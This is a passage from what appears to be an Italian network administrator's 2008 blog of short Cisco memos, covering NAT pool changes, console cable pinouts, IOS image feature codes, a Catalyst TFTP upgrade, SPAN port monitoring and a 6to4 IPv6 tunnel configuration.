clear ip nat translation *

dopodiche’ si puo’ agire sul nat indisturbati

conf t
no ip nat pool old pool name
ip nat pool new pool

Ricordo che in molti casi per poter agire su alcune configurazioni e’ necessario mettere in modalita’ “shutdown” le interfacce direttamente interessate nelle procedure di NAT

Cisco - Console Cable Pin

Sat, 30 Aug 2008 16:16:51 +0000

Signal	Console Port (DTE)	RJ-45 Rolled Cable	Adapter	Adapter	Signal
	RJ-45	RJ-45 Pin	DB-9 Pin	DB-25 Pin
CTS	1	8	7	4	RTS
DTR	2	7	4	2	0
TxD	3	6	3	2	RxD
GND	4	5	5	7	GND
GND	5	4	5	7	GND
RxD	6	3	2	3	TxD
DSR	7	2	6	8	DTR
RTS	8	1	8	5	CTS

Cisco - IOS Image

Sat, 23 Aug 2008 07:19:12 +0000

Breve prontuario per riconoscere le immagini e le relative feature (sono indicate le principali):

IP : y

ADSL : 7

IP PLUS : s

VOICE : v

CRYPTO (maggiore di 64-bit) : k9

CRYPTO (minore di 64-bit) : k8

IBM/AT/IPX : bnr2

FW/IDS : o3

H323 : x

IP/IPX/APPLETALK : bin

IP/FW : oy6

LAWFUL INTERCEPT : u2

ENTERPRISE : js

SSG : g4

Inoltre le immagini sono presenti altre immagini raggruppate per feature:

IP BASE = IOS entry level nessuna caratteristica principale IP VOICE = VoIP, VoFR, IP Telephony

ADVANCED SECURITY : IOS Firewall, IDS, SSH, IPsec, VPN, 3DES SP SERVICE : MPLS, SSH, ATM, VoATM ENTERPRISE BASE : Multiprotocol, IBM

ADVANCED IP SERVICE : IPv6, Advanced Security, Service Provider Service ENTERPRISE SERICE : Enterprise Base, IBM Full, Service Provider Service

ADVANCED ENTERPRISE SERVICE : Tutto quello descritto prima.

Cisco Catalyst - IOS Upgrade

Sat, 23 Aug 2008 06:15:52 +0000

Comandi base per aggionare un Catalyst 29xx partendo da un’immagine IOS compresssa in tar, ovviamente e’ indispensabile avere a disposizione un server TFTP con gia’ caricata nella root l’immagine.

Fase 1 - Eliminare l’immagine e eventuali web-interface con questi due comandi:

Switch#delete flash:c0000-versioneios.bin
Switch#delete flash:html/*

Fase 2 - Copiare scompattare e caricare l’immagine dall’TFTP

Switch#archive tar /xtract tftp://10.10.10.1/c0000-versioneios.bin flash:

Fase 3 - Verificare l’immagine

Switch#verify flash:c0000-versioneios.bin

Memo:

Le immagini con questa notazione “i6k2l2q4” hanno le seguenti feature: EI AND SI IOS CRYPTO

Cisco Catalyst - Port Monitoring

Fri, 22 Aug 2008 13:14:15 +0000

Piccolo memo sull’uso delle funzioni di monitoraggio, sui catalyst, nel caso di debba sniffare il traffico per installare un IDS o per un po’ di sana diagnostica in caso di problemi.

Se lo switch supporta le sessioni di monitoring, esempio se si vuole monitorare la porta 10 usando uno sniffer sulla 20 cosi':

!
monitor session 1 source interface Fa0/10
monitor session 1 destination interface Fa0/20
!

Se lo supporta il port monitoring, esempio se si vuole monitorare con uno sniffer sulla porta 20 il traffico tra porta 10 e porta 1:

!
interface FastEthernet0/20
port monitor FastEthernet0/10
port monitor FastEthernet0/1
port monitor VLAN1
!

Cisco IPv6

Wed, 20 Aug 2008 08:47:04 +0000

Anche se non credevo che fosse cosi’ semplice i tunnel 6to4 sui router cisco non sono una cosa complessa come sembra posto uno straccio di configurazione usato con il tunnel broker Hurricane Electric sul server di parigi:

interface Tunnel0
no ip address
no ip redirects
no ip unreachables
no ip proxy-arp
ipv6 address 2001:470:1F12:10A::2/64
ipv6 enable
tunnel source xxx.xxx.xxx.xxx
tunnel destination 216.66.84.42
tunnel mode ipv6ip
!
ipv6 route ::/0 Tunnel0

Attenzione questa e’ usata su un 2600 con IOS 12.3 IP FW IDS PLUS / IPSEC Ricordo che e’ bene inserire un ACL che faccia passare il protocollo 41 solo dall’end point del tunnel e ovviamente lasciare le risposte icmp abilitate